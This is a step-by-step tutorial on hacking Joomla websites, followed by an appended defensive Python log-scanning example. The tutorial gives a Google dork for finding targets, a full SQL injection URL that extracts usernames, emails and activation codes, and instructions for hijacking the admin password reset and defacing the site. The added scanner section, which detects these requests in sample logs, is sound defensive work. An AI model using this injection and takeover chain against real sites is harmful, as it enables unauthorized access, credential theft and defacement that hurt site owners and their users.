- HOW TO HACK JOOMLA WEBSITES COMPLETE TUTORIAL
- There are different ways to hack a Joomla-based website, but today I am posting
- one of the finest ways to hack Joomla websites.
- Tutorial to hack Joomla websites
- First of all, use this
- Google dork:
- inurl:"option=com_mytube"
- Enter this dork in the Google search box.
- Next is injecting the target
- Look for a URL like this:
- http://site.com/index.php?option=com_mytube&Itemid=88...
- Now you have to replace the URL like this:
- Code:
- http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
- If the site is vulnerable, you will see something like the image shown below:
- We can see username, email and activation code. (username:email:activation code)
- Now leave this page open and open a new page.
- 3- Admin password reset
- Go to:
- http://www.site.com/index.php?option=com_user&view=reset
- This is the standard Joomla! query for a password reset request.
- Type the email address found in step 2 and press Submit.
- The activation code should be reset.
- Return to the first page, refresh the page and take the new activation code.
- Paste it into the token field and press Submit.
- problem with token.. :((
- UPDATE: Joomla! 1.5.16 now hashes the reset token.
- If you see something like :$1$14411: after the activation code, it will not work.
- 4- Admin Login
- If you have done everything correctly, the password page will load. Enter your new password...
- After that go to:
- http://www.site.com/administrator/
- Standard Joomla portal content management system
- Enter the username (found in step 2) and your new password, click on Login
- Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
- In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
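
A defender's view of the request chain above, as an added example that is not part of the original paste: a Python scan of web access logs that flags non-integer `user_id` or `Itemid` values sent to `com_mytube`, then flags a `com_user` reset request from the same client. The log lines, IP addresses, combined log format and the rule that both parameters must be plain integers are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,concat%280x3a,username%29+from+jos_users-- HTTP/1.1" 200 7311',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9000',
    '192.0.2.66 - - [01/Jan/2024:10:00:30 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 2100',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 2100',
]

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQLI_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE)
INT_RE = re.compile(r'[0-9]+')
INT_PARAMS = ("user_id", "Itemid")  # assumed to hold only integers

def scan(lines):
    """Return (client_ip, finding) tuples for the request chain described above."""
    findings, suspects = [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable request line
        ip, target = m.groups()
        params = parse_qs(urlsplit(target).query)  # URL-decodes %28 and '+'
        option = params.get("option", [""])[0]
        if option == "com_mytube":
            for name in INT_PARAMS:
                for value in params.get(name, []):
                    if INT_RE.fullmatch(value):
                        continue  # well-formed integer, nothing to report
                    kind = "union-select" if SQLI_RE.search(value) else "non-integer"
                    findings.append((ip, f"{kind} value in {name}"))
                    suspects.add(ip)
        elif option == "com_user" and params.get("view") == ["reset"] and ip in suspects:
            # A reset request alone is normal; it matters only after an injection attempt.
            findings.append((ip, "password reset request after injection attempt"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the component before the value reaches the query, is what removes the injection itself; the log scan only shows who tried it.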